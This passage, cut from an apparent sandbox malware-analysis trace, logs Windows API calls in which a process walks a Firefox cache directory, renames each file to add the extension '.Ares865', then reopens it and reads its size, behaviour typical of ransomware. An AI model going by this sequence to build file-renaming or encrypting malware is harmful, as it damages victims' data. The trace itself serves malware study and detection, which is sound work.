Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_MAP_.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_map_.ares865"), dwFlags=0x1) returned 1 [0097.585] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\_CACHE_MAP_.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\_cache_map_.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.585] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8468) returned 1 [0097.590] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F" [0097.591] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0" [0097.591] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\ECB2Dd01.Ares865") returned 114 [0097.591] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\ECB2Dd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\f0\\ecb2dd01"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\ECB2Dd01.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\f0\\ecb2dd01.ares865"), dwFlags=0x1) returned 1 [0097.592] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\F0\\ECB2Dd01.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\f0\\ecb2dd01.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.593] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=43023) returned 1 [0097.598] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23" [0097.598] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\7E0FEd01.Ares865") returned 114 [0097.598] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\7E0FEd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\23\\7e0fed01"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\7E0FEd01.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\23\\7e0fed01.ares865"), dwFlags=0x1) returned 1 [0097.599] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\F\\23\\7E0FEd01.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\f\\23\\7e0fed01.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.600] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=63624) returned 1 [0097.605] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E" [0097.606] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69" [0097.606] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\885EEd01.Ares865") returned 114 [0097.606] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\885EEd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\e\\69\\885eed01"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\885EEd01.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\e\\69\\885eed01.ares865"), dwFlags=0x1) returned 1 [0097.607] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\E\\69\\885EEd01.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\e\\69\\885eed01.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.608] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=68898) returned 1 [0097.615] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D" [0097.615] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08" [0097.615] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\71469d01.Ares865") returned 114 [0097.615] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\71469d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\d\\08\\71469d01"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\71469d01.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\d\\08\\71469d01.ares865"), dwFlags=0x1) returned 1 [0097.617] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\D\\08\\71469d01.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\d\\08\\71469d01.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.617] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=33382) returned 1 [0097.622] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C" [0097.622] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6" [0097.623] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\9DCB7d01.Ares865") returned 114 [0097.623] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\9DCB7d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\c\\e6\\9dcb7d01"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\9DCB7d01.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\c\\e6\\9dcb7d01.ares865"), dwFlags=0x1) returned 1 [0097.624] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\C\\E6\\9DCB7d01.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\c\\e6\\9dcb7d01.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.624] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=137273) returned 1 [0097.634] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\B", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\B") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\B" [0097.634] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\A", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\A") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\A" [0097.635] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9" [0097.635] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0" [0097.636] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\F17B2d01.Ares865") returned 114 [0097.636] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\F17B2d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\e0\\f17b2d01"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\F17B2d01.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\e0\\f17b2d01.ares865"), dwFlags=0x1) returned 1 [0097.637] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\E0\\F17B2d01.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\e0\\f17b2d01.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.637] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=16463) returned 1 [0097.640] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61" [0097.641] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\28E95d01.Ares865") returned 114 [0097.641] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\28E95d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\61\\28e95d01"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\28E95d01.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\61\\28e95d01.ares865"), dwFlags=0x1) returned 1 [0097.642] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\61\\28E95d01.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\61\\28e95d01.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.642] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=43337) returned 1 [0097.648] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C" [0097.648] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\24B53d01.Ares865") returned 114 [0097.648] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\24B53d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\2c\\24b53d01"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\24B53d01.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\2c\\24b53d01.ares865"), dwFlags=0x1) returned 1 [0097.649] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\2C\\24B53d01.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\2c\\24b53d01.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.650] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=78805) returned 1 [0097.660] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10" [0097.660] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\16A09d01.Ares865") returned 114 [0097.660] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\16A09d01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\10\\16a09d01"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\16A09d01.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\10\\16a09d01.ares865"), dwFlags=0x1) returned 1 [0097.662] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\9\\10\\16A09d01.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\9\\10\\16a09d01.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0097.662] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=21327) returned 1 [0097.665] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\8", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\8") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\8" [0097.666] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\7", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\7") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\7" [0097.666] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\6", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\6") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\6" [0097.668] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\5", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\5") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\5" [0097.668] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\4", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\4") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\4" [0097.668] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3" [0097.669] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B" [0097.669] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\1D8FDd01.Ares865") returned 114 [0097.669] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\1D8FDd01" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\3\\4b\\1d8fdd01"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\Cache\\3\\4B\\1D8FDd01.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\mozilla\\firefox\\profiles\\silmbjec.default\\cache\\3\\4b\\1d8fdd01.ares865"), dwFlags=0x1) returned 1 [0097.670] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local 